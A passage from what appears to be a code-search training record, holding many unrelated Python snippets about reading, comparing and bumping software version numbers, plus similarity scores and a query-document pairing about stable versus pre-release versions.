\"pre\":\n micro, post, pre = VersionUtils.process_pre(micro, post, pre)\n\n if release_type == \"post\":\n dev, post = VersionUtils.process_post(dev, post)\n\n if release_type == \"dev\":\n dev = VersionUtils.process_dev(dev)\n\n if release_type == \"micro\":\n dev, micro, minor, post, pre = VersionUtils.process_micro(\n dev, micro, minor, post, pre\n )\n\n if release_type == \"minor\":\n dev, micro, minor, post, pre = VersionUtils.process_minor(\n dev, micro, minor, post, pre\n )\n\n if release_type == \"major\":\n dev, major, micro, minor, post, pre = VersionUtils.process_major(\n dev, major, micro, minor, post, pre\n )\n\n # Handle Epoch\n if release_type == \"epoch\":\n dev, epoch, major, micro, minor, post, pre = VersionUtils.process_epoch(\n dev, epoch, major, micro, minor, post, pre\n )\n\n local = \"\".join(v[5] or []) or None\n\n version_list = [major, minor, micro]\n if release_type not in [\"epoch\", \"major\", \"minor\", \"micro\", \"pre\"]:\n version_list += list(v[1][3:])\n version_string = \".\".join([str(x) for x in version_list if x or x == 0])\n\n if epoch:\n version_string = str(epoch) + epoch_name + version_string\n if pre is not None:\n version_string = VersionUtils.calc_pre_version_string(\n pre, pre_name, version_string\n )\n if post is not None:\n version_string += \".\" + post_name + str(post)\n if dev is not None:\n version_string += \".\" + dev_name + str(dev)\n if local is not None:\n version_string += \".\" + str(local)\n\n return version_string", "def latest(cls):\n releases = cls.query.all()\n if len(releases) == 0:\n return None\n\n releases.sort(key=lambda x: x.version)\n return releases[-1]", "def get_new_version(version, IS_ARCHIVE, IS_RELEASE):\n\n if not IS_ARCHIVE and not IS_RELEASE:\n return version\n\n version_split = version.split('.')\n version_split_sigfigs = len(version_split)\n\n # ARCHIVE\n if IS_ARCHIVE:\n if version_split_sigfigs == 2:\n version_split[1] = str(0)\n else:\n del version_split[-1]\n version = \".\".join(version_split)\n return version\n\n # Release\n else:\n version_split[version_split_sigfigs-1] = str(int(version_split[version_split_sigfigs-1]) + 1)\n return \".\".join(version_split)", "def latest_release_get():\n try:\n return json_response.success({'version': version.latest_version()})\n except version.Error as e:\n return json_response.error(str(e)), 200", "def get_latest_vsn(self):\n # The last version in the list should be the newest one.\n if len(self.versions) > 0:\n v = sorted(self.versions, key=lambda v: int(v['id']))[len(self.versions)-1]\n return self.get_version(v['id'])\n else: return None", "def latest_version(self):\n from leonardo_system.pip import check_versions\n return check_versions(True).get(self.name, None).get('new', None)", "def latest_version_number(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"latest_version_number\")", "def test_get_next_version_MINOR(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR, MINOR + 1, MAJOR, MINOR + 1, 0): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, MINOR, PATCH)))\n self.assertEqual('%d.%d-%d' % (MAJOR, MINOR + 1, 0), ver)", "def version_max():\n return VERSION_MAX", "def test_getNextVersion(self):\n now = date.today()\n major = now.year - VERSION_OFFSET\n version = Version(\"twisted\", major, 9, 0)\n self.assertEquals(getNextVersion(version, now=now),\n Version(\"twisted\", major, 10, 0))", "def latest_version(self):\n state = self.coordinator.data\n\n try:\n # fake a new update\n # return \"foobar\"\n return dict_get(state, \"firmware_update_info.base.version\")\n except KeyError:\n return None", "def get_version():\n click.echo(get_current_version_number())", "def previous():\n releases_list = releases()\n try:\n return releases_list[-2]\n except IndexError:\n return None", "def get_last_version(self):\n version = self.get_current_version()\n\n # read the recent file list\n if version is None:\n version = self.get_version_from_recent_files()\n\n return version", "def get_version(self):\r\n\r\n return self.versions[0].number", "def get_recent_release_from_product_details() -> int:\n rls_prod_details_json = get(\n \"https://product-details.mozilla.org/1.0/firefox_history_major_releases.json\"\n ).json()\n rls_prod_details = Series(rls_prod_details_json).sort_values(ascending=True)\n [(cur_rls_vers, _date)] = rls_prod_details[-1:].iteritems()\n cur_rls_maj, *_v = cur_rls_vers.split(\".\")\n return int(cur_rls_maj)", "def test_release_update_available_MINOR(self):\n NEXT = '%d.%d-%d' % (MAJOR, MINOR + 1, 0)\n self._uri({\n '%d.%d/maintained/%s/all/Packages.gz' % (MAJOR, MINOR + 1, NEXT): DATA,\n })\n next = self.u.release_update_available()\n self.assertEqual(NEXT, next)", "def select_release():\n release_version = unitdata.kv().get(OPENSTACK_RELEASE_KEY, None)\n if release_version is None:\n release_version = os_utils.os_release('keystone')\n unitdata.kv().set(OPENSTACK_RELEASE_KEY, release_version)\n return release_version", "def current_version(self):\n if self.current_tag:\n version = self.current_tag.lstrip('v')\n else:\n version = None\n\n if version and not version_is_valid(version):\n version = None\n\n return version", "def test_get_next_version(self):\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, MINOR, PATCH)))\n self.assertEqual(None, ver)", "def test_release_update_available_MAJOR(self):\n NEXT = '%d.%d-%d' % (MAJOR + 1, 0, 0)\n self._uri({\n '%d.%d/maintained/%s/all/Packages.gz' % (MAJOR + 1, 0, NEXT): DATA,\n })\n next = self.u.release_update_available()\n self.assertEqual(NEXT, next)", "def last_available_os_version(self) -> str:\n return pulumi.get(self, \"last_available_os_version\")", "def switch_to_latest_version(self):\n self.current_version = Version.objects.filter(is_published=True).latest()\n self.save()", "def current_version(self):\n try:\n return self.versions.latest()\n except DocumentVersion.DoesNotExist:\n return None", "def get_version():\n return 1", "def minor_version(self) -> str:\n return pulumi.get(self, \"minor_version\")", "def version(self):\n self.version_list[-1] = self.revision\n version = '.'.join(self.version_list)\n return version", "def _get_next_work_file_version(self, work_template, fields):\n existing_versions = self.parent.tank.paths_from_template(work_template, fields, [\"version\"])\n version_numbers = [work_template.get_fields(v).get(\"version\") for v in existing_versions]\n curr_v_no = fields[\"version\"]\n max_v_no = max(version_numbers)\n return max(curr_v_no, max_v_no) + 1", "def latest_product_version(product):\n return product.productversions.order_by(\"-created_on\").first()", "def get_reversion():\n return to_str(backend.get().af_get_revision())", "def next_available_version(self):\n pattern = \"{descriptor}_{task}_v*{ext}\".format(\n descriptor=self.descriptor, task=self.task, ext=self.extension)\n matching_scenefiles = []\n try:\n for file_ in self.folder_path.files():\n if file_.name.fnmatch(pattern):\n matching_scenefiles.append(file_)\n if not matching_scenefiles:\n return 1\n except OSError as err:\n return 1\n matching_scenefiles.sort()\n latest_scenefile = matching_scenefiles[-1]\n latest_version = latest_scenefile.name.stripext().split(\"_v\")[-1]\n return int(latest_version) + 1", "def get_latest_version(self):\n try:\n version = self.sourcestudyversion_set.filter(\n i_is_deprecated=False\n ).order_by( # We can't use \"latest\" since it only accepts one field in Django 1.11.\n '-i_version',\n '-i_date_added'\n ).first()\n except ObjectDoesNotExist:\n return None\n return version", "def read_release_version():\n with open(\"RELEASE-VERSION\", \"r\") as f:\n return f.readline().strip()", "def get_latest_schemaorg_version():\n tag_name = requests.get(SCHEMAORG_VERSION_URL).json()[\"tag_name\"] # \"v13.0-release\"\n mat = re.match(r\"v([\\d.]+)-release\", tag_name)\n if not mat:\n raise ValueError(f\"Unrecognized release tag name {tag_name}\")\n latest = mat.group(1)\n return latest", "def get_version():\n return '%d.%d.%d' % version_info", "def commcare_minor_release(self):\n return '%d.%d' % self.build_spec.minor_release()", "async def fetch_data(self) -> GitHubReleaseModel | None:\n result = await self._client.repos.releases.list(\n self.repository, **{\"params\": {\"per_page\": 1}}\n )\n if not result.data:\n return None\n\n for release in result.data:\n if not release.prerelease:\n return release\n\n # Fall back to the latest release if no non-prerelease release is found\n return result.data[0]", "def get_latest_ml_pipeline_version() -> str:\n\n return execute_query('''\n SELECT pipeline_version\n FROM ml_pipeline\n ORDER BY created_at DESC\n LIMIT 1\n ''')[0][0]", "def test_get_next_version_PATCH(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR, MINOR, MAJOR, MINOR, PATCH + 1): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, MINOR, PATCH)))\n self.assertEqual('%d.%d-%d' % (MAJOR, MINOR, PATCH + 1), ver)", "def version(self):\n self._get_latest_content()\n return self._data.get('version', None)", "def get_version():\n git_root = find_git_root(dirname(__file__))\n\n if git_root is not None:\n # Get the version using \"git describe\".\n cmd = \"git describe --tags --match [0-9]*\".split()\n try:\n version = subprocess.check_output(cmd).decode().strip()\n except subprocess.CalledProcessError:\n logger.exception(\"Unable to get version number from git tags\")\n exit(1)\n\n # PEP 386 compatibility\n if \"-\" in version:\n version = \".post\".join(version.split(\"-\")[:2])\n\n # Don't declare a version \"dirty\" merely because a time stamp has\n # changed. If it is dirty, append a \".dev1\" suffix to indicate a\n # development revision after the release.\n with open(os.devnull, \"w\") as fd_devnull:\n subprocess.call([\"git\", \"status\"], stdout=fd_devnull, stderr=fd_devnull)\n\n cmd = \"git diff-index --name-only HEAD\".split()\n try:\n dirty = subprocess.check_output(cmd).decode().strip()\n except subprocess.CalledProcessError:\n logger.exception(\"Unable to get git index status\")\n exit(1)\n\n if dirty != \"\":\n version += \".dev1\"\n\n return version\n\n else:\n try:\n return pkg_resources.working_set.by_key[\"graphql-validate\"].version\n except KeyError:\n return \"0.0.0-unreleased\"", "def getDBReleaseVersion(dbh, jobPars):\n\n return dbh.getDBReleaseVersion(jobPars=jobPars)", "def update_version() -> str:\n cur_version = get_current_version(args.stage)\n\n if args.stage == \"prod\":\n prv_version = get_current_version(stage='staging')\n new_version = semver.finalize_version(prv_version)\n elif args.stage == \"staging\":\n prv_version = get_current_version(stage='integration')\n assert '-integration' in prv_version\n new_version = prv_version.replace('-integration', '-rc') # don't bump the version number\n else:\n new_version = getattr(semver, f'bump_{args.release}')(str(cur_version))\n new_version = new_version if semver.parse_version_info(new_version).prerelease \\\n else semver.bump_prerelease(new_version, token='integration')\n\n if cur_version == new_version:\n print(\"Nothing to promote\")\n exit(0)\n else:\n print(f\"Upgrading: {cur_version} -> {new_version}\")\n return new_version", "def get_previous_release_info(\n previous_release_version: str | None, past_releases: list[ReleaseInfo], current_release_version: str\n) -> str | None:\n previous_release = None\n if previous_release_version == current_release_version:\n # Re-running for current release - use previous release as base for git log\n if len(past_releases) > 1:\n previous_release = past_releases[1].last_commit_hash\n else:\n previous_release = past_releases[0].last_commit_hash if past_releases else None\n return previous_release", "def GetApiVersion(cls):\n if cls.ReleaseTrack() == base.ReleaseTrack.ALPHA:\n return 'alpha'\n elif cls.ReleaseTrack() == base.ReleaseTrack.BETA:\n return 'beta'\n return 'v1'", "def get_current_version(self) -> str:\n raise NotImplementedError()", "def get_latest_tf_version(include_prerelease: bool = False) -> str:\n return get_available_tf_versions(include_prerelease)[0]", "def get_last_version(self):\n version = self.get_current_version()\n\n # read the recent file list\n if version is None:\n version = self.get_version_from_recent_files()\n\n # get the latest possible Version instance by using the workspace path\n if version is None:\n version = self.get_version_from_project_dir()\n\n return version", "def next_release_date(date):\n df = get_release_dates()\n df = df[df['ReleaseDate'] > date]\n return df['ReleaseDate'].iloc[0]", "async def get_latest_version(self, pkg: str) -> Optional[str]:\n return None", "def test_get_next_version_PATCH99(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR, MINOR, MAJOR, MINOR, 100): '',\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR, MINOR + 1, MAJOR, MINOR + 1, 0): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, MINOR, 99)))\n self.assertEqual('%d.%d-%d' % (MAJOR, MINOR + 1, 0), ver)", "def calculate_new_release_version(version):\n split_version_string = version.split(\".\")\n part_zero = split_version_string[0]\n part_one = int(split_version_string[1]) + 1\n part_two = split_version_string[2]\n new_version = f\"{part_zero}.{part_one}.{part_two}\"\n return new_version", "def get_version():\n\n with open('__init__.py') as f:\n for line in f.readlines():\n if '__version__' in line:\n apicem_version = line.strip().split(\"=\")[-1].strip(\" '\")\n if '__first_release_date__' in line:\n first_release_data_str = line.strip().split(\"=\")[-1].strip(\" '\")\n first_release_data = date(*[int(num) for num in first_release_data_str.split('.')])\n num_commits = get_cr_num(first_release_data)\n return '{apicem_version}.{num_commits}'.format(\n apicem_version=apicem_version, num_commits=num_commits)\n\n raise ValueError(\"could not read version\")", "def get_version():\r\n return __version__", "def get_max_build_version(version: str) -> str:\n return Version(version).bump_minor().get_stable().dumps()", "def get_version(self):\n\t\treturn call_sdk_function('PrlApi_GetVersion')", "def test_release_update_available_PATCH(self):\n NEXT = '%d.%d-%d' % (MAJOR, MINOR, PATCH + 1)\n self._uri({\n '%d.%d/maintained/%s/all/Packages.gz' % (MAJOR, MINOR, NEXT): DATA,\n })\n next = self.u.release_update_available()\n self.assertEqual(NEXT, next)", "def get_version():\n vers = [\"%(major)i.%(minor)i\" % __version_info__, ]\n\n if __version_info__['micro']:\n vers.append(\".%(micro)i\" % __version_info__)\n if __version_info__['releaselevel'] != 'final':\n vers.append('%(releaselevel)s' % __version_info__)\n return ''.join(vers)", "def _get_version(self):", "def get_current_version(self):\n raise NotImplementedError(\"get_current_version is not implemented\")", "def engine_version(self) -> Optional[str]:\n return pulumi.get(self, \"engine_version\")", "def get_default_version(self):\n # latest is a special case where we don't have to check if it exists\n if self.default_version == 'latest':\n return self.default_version\n # check if the default_version exists\n version_qs = self.versions.filter(\n slug=self.default_version,\n active=True\n )\n if version_qs.exists():\n return self.default_version\n return 'latest'", "def main(self):\n logging.info(\"Doing release for %s\", self.version.raw)\n\n if self.version.branch is None:\n logging.debug(\"No branch, assuming '%s'. Override with --branch.\",\n self.options.branch)\n self.version.branch = self.options.branch\n\n # No version specified, assuming a snapshot release\n if self.options.version is None:\n self.do_release(\n version=MwVersion.new_snapshot(self.options.branch))\n return 0\n\n if self.options.previousversion:\n # Given the previous version on the command line\n self.do_release(version=self.version)\n return 0\n\n no_previous = False\n if self.version.prev_version is None:\n no_previous = True\n if not self.ask(\"No previous release found. Do you want to make a \"\n \"release with no patch?\"):\n logging.error('Please specify the correct previous release ' +\n 'on the command line')\n return 1\n if no_previous or self.options.no_previous:\n self.do_release(version=self.version)\n else:\n if not self.ask(\"Was %s the previous release?\" %\n self.version.prev_version):\n logging.error('Please specify the correct previous release ' +\n 'on the command line')\n return 1\n\n self.do_release(version=self.version)\n return 0", "def version(self):\n\n if self.running() is True:\n return APIConsumer.get(\"/version\").content\n else:\n return None", "def get_version():\n return __version__", "def get_version():\n return __version__", "def get_version():\n return __version__", "def release(self) -> pulumi.Output['outputs.ReleaseResponse']:\n return pulumi.get(self, \"release\")", "def test_getNextVersionAfterYearChange(self):\n now = date.today()\n major = now.year - VERSION_OFFSET\n version = Version(\"twisted\", major - 1, 9, 0)\n self.assertEquals(getNextVersion(version, now=now),\n Version(\"twisted\", major, 0, 0))", "def get_revision(self):\n vers = self.send(\"?R\", recv=True)\n # Verify its a valid version\n # ? why was this commented out\n float(vers)\n # But return as string to avoid precision issues\n return vers", "def get_distrib_version():\n distrib, version, codename = _get_release_infos() \n return version", "def get_version(self):\n return self.version", "def test_get_next_version_MAJOR(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR + 1, 0, MAJOR + 1, 0, 0): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, MINOR, PATCH)))\n self.assertEqual('%d.%d-%d' % (MAJOR + 1, 0, 0), ver)", "def get_latest_release_id(self, application_id):\n release_id = -1\n releases = self.get_releases_by_application(application_id)\n\n if not releases.items:\n return release_id\n\n for release in releases.items:\n if (release_id < release.release_id and\n 'Completed' == release.current_analysis_status_type):\n release_id = release.release_id\n\n return release_id", "def get_version(self):\r\n return self._arm.get_version()", "def _next_version(self, dirpath: str) -> int:\n try:\n version_re = re.compile(r\"version_(\\d+)\")\n\n def is_valid_version(v: str):\n return version_re.search(v) is not None\n\n versions = tuple(filter(is_valid_version, os.listdir(dirpath)))\n if not versions:\n # No versions yet\n return 0\n current_version = natsorted(versions, reverse=True)[0]\n # Get the version number using the version pattern\n current_version = int(version_re.search(current_version).group(1))\n return current_version + 1\n except Exception as e:\n logger.warning(f\"Starting from version 0 because of error: {e}\")\n return 0", "def get_version(self):\n return self.cur_config['version']['name']", "def latest_github_tag():\n release_tags_github_url = \"https://api.github.com/repos/rackerlabs/openstack-guest-agents-unix/tags\"\n release_tags_json = urllib2.urlopen(release_tags_github_url)\n release_tags_data = json.load(release_tags_json)\n return str(release_tags_data[0]['name'])[1:]", "def getPreviousBuild():", "def save_increment(self):\n self.version = self.next_available_version()\n return self.save()", "def version(self) -> Optional[str]:\n return pulumi.get(self, \"version\")", "def version(self) -> Optional[str]:\n return pulumi.get(self, \"version\")", "def version(self) -> Optional[str]:\n return pulumi.get(self, \"version\")" ]
[ "0.74370474", "0.7424086", "0.7209765", "0.7072295", "0.68549937", "0.68467635", "0.6822434", "0.6782135", "0.675786", "0.6439284", "0.64025617", "0.6362353", "0.6344141", "0.63141763", "0.6309239", "0.6289336", "0.6222575", "0.610926", "0.6093002", "0.60867167", "0.6048308", "0.60249436", "0.60151535", "0.5974705", "0.59424496", "0.5940804", "0.5930821", "0.59263897", "0.59194994", "0.5912126", "0.5899272", "0.58882505", "0.5861875", "0.5853393", "0.5832562", "0.5818481", "0.58079565", "0.57782865", "0.57638115", "0.5761821", "0.5747232", "0.5728893", "0.5696332", "0.5683644", "0.5670163", "0.5665485", "0.56644344", "0.56632596", "0.565963", "0.5652015", "0.56420606", "0.56337273", "0.5627977", "0.5619189", "0.56117076", "0.56046677", "0.56010824", "0.5593114", "0.5586504", "0.5584942", "0.5570424", "0.5567353", "0.5558816", "0.5549726", "0.55468494", "0.5534981", "0.5534177", "0.55275595", "0.55268663", "0.55196786", "0.55180436", "0.55112773", "0.55066454", "0.54990023", "0.5497661", "0.549689", "0.5495849", "0.54928786", "0.5488536", "0.548553", "0.54835016", "0.5478099", "0.5478099", "0.5478099", "0.54747325", "0.5472497", "0.54652214", "0.5464758", "0.54428816", "0.54298997", "0.54068846", "0.54001963", "0.53999424", "0.539585", "0.5395001", "0.5393988", "0.538641", "0.5384663", "0.5384663", "0.5384663" ]
0.68445814
6
Whether version is not prerelease or devrelease.
def is_stable(self) -> bool: return not self.is_prerelease
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def is_release():\n return VERSION[-1]", "def is_release(self):\n # version string: N.N.N.N is for release.\n return bool(re.match(r'^[\\d.]+$', self.version))", "def is_production(version=None):\n return is_host_google() and is_default_version(version)", "def is_0_release(release: str) -> bool:\n if release == \"current_branch\":\n return False\n version = packaging.version.parse(release)\n return version < packaging.version.Version(\"1.0\")", "def is_dev(version):\n return re.match(r'^.*\\.dev\\d+$', version)", "def version_is_full_release(version_string):\n match = VERSION_REGEX.match(version_string)\n\n if match and match.groupdict()[\"modifier\"] == \"\":\n return True\n else:\n return False", "def test_release_tag_for_dev_version(self) -> None:\n self.assertEqual(\"v42.12\", release_tag())", "def has_prerelease(req):\n return any(parse_version(spec.version).is_prerelease for spec in req.specifier)", "def is_staging(version=None):\n return is_host_google() and not is_default_version(version)", "def is_devel(self):\r\n\r\n return self.is_debug()", "def is_release_branch():\n diff_string_config_yml = run_command(\"git diff origin/master .circleci/config.yml\")\n if re.search(r'[+-][ ]+CONTENT_VERSION: \".*', diff_string_config_yml):\n return True\n\n return False", "def is_version_2_6() -> bool:\n v = get_version()\n if v[1] != \"singularity\" and v[1] != \"singularity-ce\":\n return False\n return v[0][0] == 2 and v[0][1] == 6", "def keep_old(ver: str) -> bool:\n ver = travis_normalize_py_version(ver)\n if ver == 'PyPy':\n return any(v.startswith('2') for v in new_versions)\n if ver == 'PyPy3':\n return any(v.startswith('3') for v in new_versions)\n return not is_important(ver)", "def is_version_3_4_or_newer() -> bool:\n if is_apptainer_1_or_newer():\n return True # this is equivalent to singularity-ce > 3.9.5\n v = get_version()\n return v[0][0] >= 4 or (v[0][0] == 3 and v[0][1] >= 4)", "def is_version_3_or_newer() -> bool:\n if is_apptainer_1_or_newer():\n return True # this is equivalent to singularity-ce > 3.9.5\n v = get_version()\n return v[0][0] >= 3", "def test_check_version_non_release(self):\n with self.assertLogs(\"dakara_feeder.version\", \"DEBUG\") as logger:\n with patch.multiple(\n \"dakara_feeder.version\", __version__=\"0.1.0-dev\", __date__=\"1970-01-01\"\n ):\n check_version()\n\n # assert effect on logs\n self.assertListEqual(\n logger.output,\n [\n \"INFO:dakara_feeder.version:\" \"Dakara feeder 0.1.0-dev (1970-01-01)\",\n \"WARNING:dakara_feeder.version:\"\n \"You are running a dev version, use it at your own risks!\",\n ],\n )", "def prod(environment):\n return environment == 'live' or environment == 'debug' or environment == 'prod'", "def is_version_3_1_or_newer() -> bool:\n if is_apptainer_1_or_newer():\n return True # this is equivalent to singularity-ce > 3.9.5\n v = get_version()\n return v[0][0] >= 4 or (v[0][0] == 3 and v[0][1] >= 1)", "def is_valid_version(self):\n pass", "def is_on(self) -> bool:\n current = self.coordinator.data.info.version\n beta = self.coordinator.data.info.version_latest_beta\n stable = self.coordinator.data.info.version_latest_stable\n\n return current is not None and (\n (stable is not None and stable > current)\n or (\n beta is not None\n and (current.alpha or current.beta or current.release_candidate)\n and beta > current\n )\n )", "def test_release_tag(self) -> None:\n self.assertEqual(\"v3.14.15\", release_tag())", "def is_dev_version(cls):\n\n # We initiate the command we have to run in order to\n # get the branch we are currently working with.\n command = \"git branch\"\n\n # We execute and get the command output.\n command_result = PyFunceble.helpers.Command(command).execute()\n\n for branch in command_result.split(\"\\n\"):\n # We loop through each line of the command output.\n\n if branch.startswith(\"*\") and (\"dev\" in branch or \"3.x\" in branch):\n # The current branch is `dev`.\n\n # We return True.\n return True\n\n # The current branch is not `dev`.\n\n # We return False.\n return False", "def test_os_release(self):\n self.assertEqual(self.settings.OS_RELEASE, platform.release())", "def distributionRequiresNoTtyPatch():\n\tdistributor = Distribution().distributor.lower()\n\n\treturn bool('redhat' in distributor or 'centos' in distributor)", "def test_pre_release(scraper, version_parts):\n\n new_version_parts = list(version_parts)\n if len(new_version_parts) > 4:\n new_version_parts[4] = int(new_version_parts[4]) + 1\n elif len(new_version_parts) > 3:\n new_version_parts.append(1)\n else:\n new_version_parts.extend(['a', 1])\n\n assert scraper.is_compatible_with(generate_version(new_version_parts)) is True", "def has_set_up_py_in(self):\n return (self.version_info >= (4, 10))", "def no_prereq_install():\n return str2bool(os.environ.get('NO_PREREQ_INSTALL', 'False'))", "def test_changeVersionsWithPrerelease(self):\n self._testVersionChanging(9, 2, 7, 38)", "def warn_default(version):\r\n if config.warn.ignore_bug_before == 'None':\r\n return True\r\n if config.warn.ignore_bug_before == 'all':\r\n return False\r\n if config.warn.ignore_bug_before >= version:\r\n return False\r\n return True", "def dev(self) -> bool:\n return \"d\" in self.modifier if self.modifier else \"dev\" in self.string", "def good_py_version() -> bool:\n return sys.version_info.major >= 3 and sys.version_info.minor >= 6", "def devel(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"devel\")", "def exists():\n return PYTHON_VERSION is not None", "def fix_has_no_advisory(self):\n fixed_in = self.fixed_artifact()\n return fixed_in and fixed_in.vendor_no_advisory", "def is_hide_prod_version_enabled(cluster_config):\n\n cluster = load_cluster_config_json(cluster_config)\n try:\n return cluster[\"environment\"][\"hide_product_version\"]\n except KeyError:\n return False", "def in_travis_pr():\n # NOTE: We're a little extra cautious and make sure that the\n # PR environment variable is an integer.\n try:\n int(os.getenv(TRAVIS_PR_ENV, ''))\n return True\n except ValueError:\n return False", "def on_production(self):\n\n if not self.is_valid_platform() and not self.in_build():\n return False\n prod_branch = 'production' if self.on_dedicated() else 'master'\n return self['BRANCH'] == prod_branch", "def no_afni():\n if Info.version() is None:\n return True\n return False", "def isProduction(obj):\n return 'PROD' in obj.tags # This is deprecated? obj.tags.has_key('PROD')", "def is_apptainer_1_or_newer() -> bool:\n v = get_version()\n if v[1] != \"apptainer\":\n return False\n return v[0][0] >= 1", "def check_version_str(version):\n if not version.startswith('v') and version != 'current':\n version = 'v%s' % version\n return version", "def oskernel_isgreater(self, version):\n match = re.search(r\"([0-9.]+)\", self.oskernel())\n if match:\n os_release = match.group(1)\n else:\n return True\n\n for (idx, os_version) in enumerate(os_release.split('.')):\n if idx >= len(version):\n break\n if int(os_version) > int(version[idx]):\n return True\n if int(os_version) < int(version[idx]):\n return False\n\n return True", "def skip_check():\n if os.getenv('LEAPP_DEVEL_SKIP_CHECK_OS_RELEASE'):\n reporting.create_report([\n reporting.Title('Skipped OS release check'),\n reporting.Summary('Source RHEL release check skipped via LEAPP_DEVEL_SKIP_CHECK_OS_RELEASE env var.'),\n reporting.Severity(reporting.Severity.HIGH),\n reporting.Groups(COMMON_REPORT_TAGS)\n ] + related)\n\n return True\n return False", "def is_default_version(version=None):\n version = version or get_current_version_name()\n return version == get_default_version()", "def get_release_version(self):\n return self.get_property(ADB.VERSION_RELEASE_PROPERTY)", "def get_version():\n return \"0.0.1 (prerelease prototype)\"", "def compatible_version(self):\n note_version = self.py_version\n py_version = sys.version_info\n if note_version[0] != py_version[0]:\n return False\n if len(note_version) > 1 and note_version[1] > py_version[1]:\n return False\n return True", "def is_version_valid(version):\n return _compiled_version_regex.match(version) is not None", "def devel(self) -> pulumi.Output[Optional[bool]]:\n return pulumi.get(self, \"devel\")", "def _does_require_deprecation(self):\n\n for index, version_number in enumerate(self.current_version[0][:2]):\n # We loop through the 2 last elements of the version.\n\n if version_number > self.version_yaml[index]:\n # The currently read version number is greater than the one we have in\n # the version.yaml.\n\n # We return True.\n return True\n\n # We return False, we do not need to deprecate anything.\n return False", "def is_pinned_version(version):\n return is_valid_instance_id(version) or is_valid_tag(version)", "def check_image_version(duthost):\n skip_release(duthost, per_command_check_skip_versions)", "def is_requested_version_specified(self):\n return self.requested_version > FlexibleVersion(VERSION_0)", "def in_build(self):\n\n return self.is_valid_platform() and not self['ENVIRONMENT']", "def is_valid_version(self) -> bool:\n return self._is_valid_version()", "def test_release_version():\n pkg_vars = {}\n with open(VERSION_FILE) as f:\n exec(f.read(), pkg_vars) # nosec\n project_version = pkg_vars[\"__version__\"]\n assert (\n RELEASE_TAG == f\"v{project_version}\"\n ), \"RELEASE_TAG does not match the project version\"", "def get_version():\n return 1", "def test_check_version_release(self):\n with self.assertLogs(\"dakara_feeder.version\", \"DEBUG\") as logger:\n with patch.multiple(\n \"dakara_feeder.version\", __version__=\"0.0.0\", __date__=\"1970-01-01\"\n ):\n check_version()\n\n # assert effect on logs\n self.assertListEqual(\n logger.output,\n [\"INFO:dakara_feeder.version:\" \"Dakara feeder 0.0.0 (1970-01-01)\"],\n )", "def test_is_not_local_dev(self):\n\n expected = False\n actual = Version.is_local_dev()\n\n self.assertEqual(expected, actual)", "def get_current_release():\n return _CURRENT_RELEASE", "def is_proprietary():\n return False", "def is_developer(self):\n return int(self.developer_status) == 2", "def is_development():\n return os.environ.get('SERVER_SOFTWARE', '').startswith('Development')", "def get_prerelease_package_version(self, production: bool = False) -> str:\n rc = 1\n if describe := get_git_describe(CONFIG.mpy_path.as_posix()):\n ver, rc, _ = describe.split(\"-\")\n base = bump_version(Version(ver), minor_bump=True)\n rc = int(rc)\n return str(bump_version(base, rc=rc))\n else:\n raise ValueError(\"cannot determine next version number micropython\")", "def get_version():\n vers = [\"%(major)i.%(minor)i\" % __version_info__, ]\n\n if __version_info__['micro']:\n vers.append(\".%(micro)i\" % __version_info__)\n if __version_info__['releaselevel'] != 'final':\n vers.append('%(releaselevel)s' % __version_info__)\n return ''.join(vers)", "def update_pkg_version(self, production: bool) -> str:\n return (\n self.get_prerelease_package_version(production) if self.mpy_version == \"latest\" else self.get_next_package_version(production)\n )", "def __getNullVersion(self):\n print(\"Can't get version\")\n return \"unknownVendor\", \"unknownRelease\"", "def run_in_apache():\n return CompareOpenStackReleases(os_release('keystone')) >= 'liberty'", "def in_valid_context(package):\n return os.getenv(\"REZ_{name}_VERSION\".format(name=package.name.upper())) == str(\n package.version\n )", "def python_build():\n return _sys_version()[4:6]", "def isDBReleaseFile(dbh, lfn):\n\n if dbh:\n return dbh.extractVersion(lfn)\n else:\n return False", "def is_valid_version(version):\n return bool(\n is_valid_instance_id(version) or\n is_valid_tag(version) or\n REF_RE.match(version)\n )", "def has_composed_rpm_bulid_libs(self):\n return self.version_info >= (4, 9, 0)", "def _is_popt_devel_installed(self):\n raise NotImplementedError('Implement this method.')", "def _does_require_force_update(self):\n\n if self.current_version[0][0] > self.version_yaml[0]:\n # The current version first index is greater than the one we have in the\n # current version.yaml.\n\n # We return True.\n return True\n\n # We return False, we do not need to force the update for\n # the current version number.\n return False", "def test_release_update_available_NO(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/all/Packages.gz' % (MAJOR, MINOR, MAJOR, MINOR, PATCH): DATA,\n })\n next = self.u.release_update_available()\n self.assertEqual(None, next)", "def check_if_release_version_ok(\n past_releases: list[ReleaseInfo],\n current_release_version: str,\n) -> tuple[str, str | None]:\n previous_release_version = past_releases[0].release_version if past_releases else None\n if current_release_version == \"\":\n if previous_release_version:\n current_release_version = previous_release_version\n else:\n current_release_version = (datetime.today() + timedelta(days=5)).strftime(\"%Y.%m.%d\")\n if previous_release_version:\n if Version(current_release_version) < Version(previous_release_version):\n console.print(\n f\"[red]The release {current_release_version} must be not less than \"\n f\"{previous_release_version} - last release for the package[/]\"\n )\n raise Exception(\"Bad release version\")\n return current_release_version, previous_release_version", "def _is_version_greater(self):\n\n # we compare the 2 versions.\n checked = PyFunceble.abstracts.Version.compare(\n self.data_version_yaml[\"current_version\"]\n )\n\n if checked is not None and not checked:\n # The current version is greater as the older one.\n\n # We return True.\n return True\n\n # We return False\n return False", "def get_version(cls):\n if Config.ENV_TYPE == PRD:\n return Config.version + \"/\" + Config.build\n return Config.version + \"/\" + Config.build + \"/\" + Config.generate + ' (' + Config.ENV_NAME + ')'", "def infer_webserver_package(release: str) -> str:\n if release == 